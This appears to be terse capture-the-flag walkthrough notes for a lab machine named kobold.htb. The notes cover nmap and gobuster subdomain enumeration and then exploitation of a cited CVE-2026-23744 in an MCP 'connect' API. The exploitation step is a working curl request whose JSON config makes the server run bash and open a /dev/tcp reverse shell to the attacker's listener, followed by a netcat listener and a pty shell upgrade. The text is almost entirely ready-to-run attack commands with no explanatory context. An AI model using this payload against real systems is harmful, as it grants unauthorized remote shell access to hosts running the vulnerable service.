###VHOST K*** part 1### ##Steps to user##
#Nmap Enumeration 1. nmap -sV -sC -p- --min-rate 10000 10.129.245.50 -v 2. nmap -sV -sC -p80,22,443,6552 10.129.245.50 -v
#DNS & VHost Enumeration 3. gobuster dns --do kobold.htb - \ /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt #Result bin.kobold.htb ::ffff:10.129.245.50 mcp.kobold.htb ::ffff:10.129.245.50
#CVE-2026-23744 4. nc -lvnp 4224 5. curl -sk https://mcp.kobold.htb/api/mcp/connect --header “Content-Type: application/json” --data ‘{“serverConfig”:{“command”:“/bin/bash”,“args”:[“-c”,“bash -l >& /dev/tcp/10.10.14.77/4224 0<&1 2>&1”],“env”:{}},“serverId”:“test”}’ 6. python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
